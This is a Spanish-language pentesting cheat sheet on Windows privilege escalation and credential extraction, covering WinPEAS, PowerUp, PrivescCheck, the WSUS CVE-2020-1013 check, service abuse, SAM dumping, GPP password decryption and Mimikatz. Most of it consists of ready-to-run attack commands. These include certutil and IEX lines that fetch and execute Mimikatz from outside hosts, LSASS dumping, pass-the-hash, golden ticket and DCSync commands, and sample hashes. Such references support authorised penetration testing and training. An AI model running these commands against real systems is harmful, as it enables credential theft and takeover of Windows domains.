Windows
Enumeración automatizada
WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
Última versión y binarios: https://github.com/peass-ng/PEASS-ng/releases
iwr https://github.com/peass-ng/PEASS-ng/releases/download/20241007-05f777b2/winPEASx64.exe -outputfile winpeas64.exeOtras formas de transferir ficheros: Misc
Ejecución básica:
.\winPEASx64.exePara entornos más restringidos, se puede usar un loader que permita cargar y ejecutar en memoria el programa. Por ejemplo:
.\sloader.exe -f C:\Pentest\Tools\winPEASx64.exe -p notcolor logPowerUp
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. C:\AD\Tools\PowerUp.ps1[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)Se enumeran las posibles vías de elevación de privilegios y se exporta la información a un fichero html:
Invoke-AllChecks -HTMLReportPrivescCheck
https://github.com/itm4n/PrivescCheck
git clone "https://github.com/itm4n/PrivescCheck.git"Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XMLVulnerabilidades
Actualizaciones vía WSUS
WSUS (Windows Server Update Services) es un servicio que permite gestionar la distribución de actualizaciones en redes corporativas con sistemas Windows.
Es un servidor centralizado que descarga y distribuye parches de seguridad y actualizaciones en los clientes de la red local.
Para comprobar si el servidor WSUS es vulnerable a CVE-2020-1013, se tienen que dar dos condiciones:
El servidor WSUS tiene que utilizar el protocolo HTTP en vez de HTTPS. Para comprobar cuál servidor WSUS se está utilizando:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServerHKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://xtormin.local:8530Que el uso del servidor WSUS esté activado. Para ello, el resultado del siguiente registro debe ser igual a 0:
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServerWriteup de la investigación y presentación en la BlackHat:
Otras referencias:
Escalada de privilegios
Equipo conectado con Azure
wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1Otras formas de transferir ficheros: Misc
Azure-ADConnect -server 127.0.0.1 -db ADSyncServicio modificable
Identificación
PowerUp
Get-ModifiableServiceEjemplo de explotación
PowerUp
Invoke-ServiceAbuse -Name 'WebServer' -UserName 'xtormincorp\xtormin' -VerboseMáquinas del dominio con acceso privilegiado
Buscar máquinas donde el usuario tiene permisos de administrador local:
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccesswinrs:
winrs -r:<Nombre de la máquina> cmd
set username
set computernamePSSession:
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
$env:usernameExtracción de credenciales
Obtención de SAM, SYSTEM, SECURITY
reg save HKLM\SAM C:\WINDOWS\Temp\sam.dmp
reg save HKLM\SYSTEM C:\WINDOWS\Temp\system.dmp
reg save HKLM\security C:\WINDOWS\Temp\security.dmpsamdump2 system sam/home/kali/tools/impacket/examples/secretsdump.py -sam sam.dmp -system system.dmp -security security.dmp LOCALGPP - Group Password Policy
cd %windir%\system32\grouppolicy<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>gpp-decrypt jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQMimikatz
certutil -urlcache -split -f http://192.168.119.142/mimikatz.exe C:\Windows\Temp\mimikatz.exe && C:\Windows\Temp\mimikatz.exe
powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCredsprivilege::debug
log
log customlogfilename.log
token::elevateDump LSASS
privilege::debug
token::elevate
sekurlsa::logonpasswordsSeckurlsa
sekurlsa::ekeys
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
sekurlsa::tickets
sekurlsa::tickets /export
sekurlsa::tspkg
sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:4c13687d23a3a88e57fc9ef8bb4cdf2f /run:cmd
sekurlsa::minidump c:\Windows\Temp\lsass.dmpKerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbiDSync
lsadump::dcsync /user:domain\krbtgt /domain:xor.com
lsadump::dcsync /domain:xor.com /all /csv
lsadump::dcsync /domain:xor.com /user:administrator
lsadump::lsa /injecttoken::elevate
lsadump::sam
lsadump::secrets
lsadump::cache
token::revertVault
vault::cred
vault::cred /patch
vault::listTerminal Services
ts::multirdp
ts::logonpasswordsPass-the-Hash
sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrator /domain:xtormincorp.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:{NTLM_hash} /run:cmd.exeCredenciales en eventos de logs
Se parsean los logs de Windows Event ID 4688 para extraer credenciales:
nxc smb 192.168.1.100 -u $USER -p $PASS -M eventlog_credsReferencias
Track 3 15 Goodbye Obfuscation Hello Invisi Shell Hiding Your Powershell Script in Plain Sight Omer - https://www.youtube.com/watch?v=Y3oMEiySxcc
Última actualización
¿Te fue útil?